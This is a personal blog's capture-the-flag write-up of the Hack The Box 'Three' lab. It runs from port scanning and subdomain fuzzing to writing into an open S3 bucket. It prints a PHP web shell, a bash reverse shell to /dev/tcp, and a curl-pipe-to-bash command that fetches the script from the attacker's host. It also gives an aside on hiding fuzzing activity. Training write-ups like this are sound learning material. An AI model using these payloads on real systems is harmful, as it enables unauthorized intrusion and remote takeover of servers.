Github LinkedIn Twitter Podcast Blog About

Write up- Three

2022-09-06 20:32:16

This is going to be a small writeup for HTB “starting point” three

We are given a server which we don’t know anything about, just an IP. (10.129.186.57) note. the domain and subdomain is always registred in /etc/hosts VPN_ADDRESS - is your tunnell address which you can find via ifconfig

first thing first, information gathering.

So, knowing the IP, lets scan it.

nmap -sV -p- -T5 -vv 10.129.186.57 where nmap is a tool to scan IP addresses ports (and not only) -sV means scan with version detection -p- means scan all the ports -T means timing policy -vv is very verbose and the last is the IP.

after this, we receive the information that there are 2 open ports

22/tcp open  ssh     syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 17:8b:d4:25:45:2a:20:b8:79:f8:e2:58:d7:8e:79:f4 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCitBp4qe2+WEqMGa7+L3eEgbrqD/tH3G5PYsQ9nMFx6Erg9Rp+jn7D9QqC9GqKdraCCUQTzVoW3zqEd83Ef4iWR7VXjTb469txJU+Y8XlG/4JzegbjO6WYyfQTtQ3nLkqpa21BZEdH9ap28mcJAggj4/uHTiA3yTgZ2C+zPA6LoIS7CaB1DPK2q/8wrxDiRNv4gGiSjcxEilpL8Qls4R3Ny3QJD89hvgEdV9zapTS5T9hOfUdwbkElabjrWL4zs/E+cyHSZF5pPREiv6QkdMmk7cvMND5epXA29womDuabJsDLhrFYFecJxDmXhv6yspRAemCewOX+GnWckerKYeOf
|   256 e6:0f:1a:f6:32:8a:40:ef:2d:a7:3b:22:d1:c7:14:fa (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBEkEPksFeIH9z6Ds6r7s2Uff45kDk/PEnvXYwP0ny6pKsP2s62W3PZVCywfF3aC8ONsAqQh6zy0s44Zv8B8g+rI=
|   256 2d:e1:87:41:75:f3:91:54:41:16:b7:2b:80:c6:8f:05 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINwGMkF/JG8KPrh19vLPmhe+RC0WBQt06gh1zE3EOo2q
80/tcp open  http    syn-ack Apache httpd 2.4.29 ((Ubuntu))
|_http-title: The Toppers
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

22, and 80. that means it might have http port and ssh. lets check the website.

first things first, lets get all information about the domain. we firstly get the info about the domain name “thetoppers.htb” by searching trough source code and contact email.

Seing this, we can try doing something. like trying to get some subdomains. we can try a zone transfer, with random ns (basically, try to guess that nameserver is ns.DOMAIN )

ve can do dig -axfr domain.name @ns.something.com if you can’t get any info, that means that you basically can’t get zone transfer. (fun fact, this is one thing you could do with some universities)

After trying one way to get subdomains, we can try another, with fuzzing. you can use something like gobuster for this. Gobuster is pretty good tool to go over a lot of domains in fast way (and has a lot other things)

but using this, you’ll need to use wordlist. here are some https://github.com/danielmiessler/SecLists/blob/master/Discovery/DNS/subdomains-top1million-5000.txt https://raw.githubusercontent.com/danTaler/WordLists/master/Subdomain.txt https://www.kali.org/tools/wordlists/

we can try something like gobuster vhost -u http://thetoppers.htb -w /mnt/hdd/Other/subdomain_list_20k.txt

with this command, gobuster will basically ping every “subdomain” within that list and hope for a good response like 200, or 500, or whatever.

After scanning with this keyword list, we find out, that there is a subdomain, called s3.thetoppers.htb

knowing what s3 means (aws s3), we can try some things to access it.

first things first, download and set up awscli, and configure it with a random account, for the first time. empty values won’t work most of the time. so if you put aws configure values like temp

knowing that. we can try get the info about the buckets. (first, try the basic, like s3://… without the endpoint, to perhaps get on the)

aws s3 --endpoint=http://s3.thetoppers.htb ls

running this command you can try and see the buckets.

running this we found out that there is a bucket visible there s3://thetoppers.htb so, lets check what’s inside

aws s3 --endpoint=http://s3.thetoppers.htb ls s3://thetoppers.htb

running this, we can see all the things what is inside the bucket. we see .htaccess and index.php and some other files.

knowing the bucket, we can try and check some permissions. For example, if we can download something, write over, or upload something.

firstly, lets try with uploading an empty file basically "" > file.txt and upload it to the server.

aws --endpoint=http://s3.thetoppers.htb s3 cp file.txt s3://thetoppers.htb

if this is possible, great- we can upload things there. and the server is vulnerable.

knooowing this, we can try something more. currently what we know:

  1. the server has a public bucket
  2. the bucket has php file in it
  3. the server is running on php/apache
  4. you can upload files

knowing this, well, you can try, and upload a file, which basically uses phps system command with a GET variable.

why so? firstly, get variables can be added in urls (basically example.com?stuff=1. it would be possible to get $_GET[\’stuff\’])

upload a file to server which contains something like <?php system($_GET["cmd"]); ?> > file | aws ....

https://www.php.net/manual/en/function.system.php

So, we got an “shell”. after using but.. we can do more. we can gain actual access from our console, not our browser. After that, we have to do two things:

  1. make a location, where the “victim” connects to us
  2. listen to everything what connects to us
  3. send a bash file, which gives a reverse shell.

so, to make a location to connect to our system is easy. do something like python3 -m http.server 8000 to start a server

and we can use nc ( https://www.cyberithub.com/install-netcat-command-on-linux/ )

nc -nvlp 69

which is n - don’t resolve (only ip addresses) v - verbose l - forward local port to remote address p - local port (69)

And then the last one. reverse shell. and upload to it to the s3. create a bash file, which basically sends tcp packets to your ip, like

#!/bin/bash  
bash -i >& /dev/tcp/VPN_ADDRESS/1337 0>&1

-i is to act as an interactive shell rest is… basically this https://unix.stackexchange.com/questions/525653/why-are-or-required-to-use-dev-tcp this is a good material. the command listens to a connect/socket whatever. basically, you’ll give a shell.

nooow then, when everything is set up, try this

http://thetoppers.htb/shell.php?cmd=curl%20VPN_ADDRESS:8000/shell.sh|bash

and now you got reverse shell. and you got full access to the user.

notes:

  1. aws doesn’t work on all systems correctly with this box. better use Kali or parrot, manjaro won’t work that well
  2. I would really advise to check a lot on the fuzzers. it will help you a lot. even more, if you learn how to hide your ass when you’re doing fuzzing.
  3. learn more about reverse shells. it’s one of the most important things to create connectiong to the victim. it’s a good knowledge, even more, if you’re doing OSCP
  4. Do the tasks on kali.
  5. learn more about nmap/nc.

and other things. this was kind of a “eureka, i need to learn more” moment with this box.



Back
Dawgora 2020